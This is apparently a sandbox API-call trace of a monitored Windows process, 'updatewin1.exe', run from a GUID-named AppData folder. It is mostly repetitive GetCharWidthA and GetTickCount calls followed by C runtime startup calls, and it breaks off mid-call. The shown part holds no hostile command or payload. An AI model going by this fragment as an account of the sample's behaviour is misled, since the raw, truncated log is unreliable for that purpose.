GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.937] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.981] GetTickCount () returned 0x115232b [0121.981] GetTickCount () returned 0x115232b [0121.981] GetTickCount () returned 0x115232b [0121.981] GetTickCount () returned 0x115232b [0121.981] GetTickCount () returned 0x115232b [0121.981] GetTickCount () returned 0x115232b [0121.981] GetTickCount () returned 0x115232b [0121.981] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.982] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.983] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.984] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.985] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.986] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b [0121.987] GetTickCount () returned 0x115232b Process: id = "9" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" page_root = "0x52c3c000" os_pid = "0xab0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xa80" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 114 os_tid = 0x24c [0128.851] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x57221a10, dwHighDateTime=0x1d6bf06)) [0128.851] GetCurrentProcessId () returned 0xab0 [0128.851] GetCurrentThreadId () returned 0x24c [0128.851] GetTickCount () returned 0x11536e9 [0128.851] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=24913235535) returned 1 [0128.868] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0128.868] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3e0000 [0128.870] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.870] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0128.870] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0128.870] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0128.870] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0128.870] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.872] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.872] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.872] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.873] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.873] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.873] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x214) returned 0x3e07d0 [0128.873] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.873] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.874] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.874] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.874] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.874] GetCurrentThreadId () returned 0x24c [0128.874] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0128.874] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x800) returned 0x3e09f0 [0128.874] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0128.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0128.874] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.874] SetHandleCount (uNumber=0x20) returned 0x20 [0128.874] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" " [0128.875] GetEnvironmentStringsW () returned 0x2b4e70* [0128.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0128.875] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x565) returned 0x3e11f8 [0128.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x3e11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0128.875] FreeEnvironmentStringsW (penv=0x2b4e70) returned 1 [0128.875] GetLastError () returned 0x0 [0128.875] SetLastError (dwErrCode=0x0) [0128.875] GetLastError () returned 0x0 [0128.875] SetLastError (dwErrCode=0x0) [0128.875] GetLastError () returned 0x0 [0128.875] SetLastError (dwErrCode=0x0) [0128.875] GetACP () returned 0x4e4 [0128.875] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x220) returned 0x3e1768 [0128.875] GetLastError () returned 0x0 [0128.876] SetLastError (dwErrCode=0x0) [0128.876] IsValidCodePage (CodePage=0x4e4) returned 1 [0128.876] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0128.876] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0128.876] GetLastError () returned 0x0 [0128.876] SetLastError (dwErrCode=0x0) [0128.876] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0128.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0128.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0128.876] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0128.876] GetLastError () returned 0x0 [0128.876] SetLastError (dwErrCode=0x0) [0128.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0128.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0128.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鳌㞕AĀ") returned 256 [0128.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" 